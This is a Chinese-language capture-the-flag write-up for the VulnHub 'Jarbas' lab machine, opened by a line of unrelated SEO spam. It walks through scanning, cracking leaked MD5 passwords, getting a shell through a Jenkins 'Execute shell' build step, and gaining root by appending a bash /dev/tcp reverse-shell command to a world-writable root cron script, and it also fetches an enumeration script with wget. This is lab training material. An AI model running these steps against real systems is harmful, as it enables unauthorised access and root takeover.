东莞南城网站开发公司,亳州公司做网站,小程序主题wordpress,做查询网站费用希望和各位大佬一起学习#xff0c;如果文章内容有错请多多指正#xff0c;谢谢#xff01;
个人博客链接#xff1a;CH4SER的个人BLOG – Welcome To Ch4sers Blog
Jarbas 靶机下载地址#xff1a;https://www.vulnhub.com/entry/jarbas-1,232/
0x01 信息收集
Nmap…希望和各位大佬一起学习如果文章内容有错请多多指正谢谢
个人博客链接CH4SER的个人BLOG – Welcome To Ch4sers Blog
Jarbas 靶机下载地址https://www.vulnhub.com/entry/jarbas-1,232/
0x01 信息收集
Nmap扫描目标主机发现开放22、80、8080、3306端口分别运行OpenSSH 7.4、Apache httpd 2.4.6、Jetty、MariaDB服务目标操作系统为Linux。
访问80端口页面如下
访问8080端口 是一个Jenkins网站类似域Github的项目管理右下角显示其版本为Jenkins ver. 2.113
使用DirSearch扫描目标主机80端口网站目录得到敏感目录/access.html
python dirsearch.py -u http://192.168.196.140/ -z yes 访问/access.html得到几个用户名和md5加密密码解密后如下
tiago: italia99
trindade: marianna
eder: vipsu 0x02 权限获取
因开放3306端口猜测可能为MySQL账号密码尝试连接但失败。尝试登录8080端口的Jenkins使用eder: vipsu登录成功。 对于类Github的中间件比如上个靶场Devguru的Gitea都可以去寻找有没有命令执行的地方然后尝试反弹shell。
选择新建任务 构建一个自由风格的软件项目 构建 增加构建步骤 Execute shell 写入反弹shell命令后保存。 Kali这边nc监听5566端口Jenkins这边点击立即构建成功收到会话。 0x03 权限提升
上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下给予执行权限执行。
辅助项目下载地址https://github.com/rebootuser/LinEnum
cd /tmp;wget -O 1.sh http://192.168.196.128/LinEnum.sh
chmod x 1.sh;./1.sh
检测到存在计划任务每5分钟以root权限执行一次/etc/script/CleaningScript.sh 该文件权限为777内容为清理访问日志。 将bash反弹命令追加到后面去Kali这边nc监听5555端口等待一段时间成功收到会话拿到root权限和flag。
echo bash -i /dev/tcp/192.168.196.128/5555 01 /etc/script/CleaningScript.sh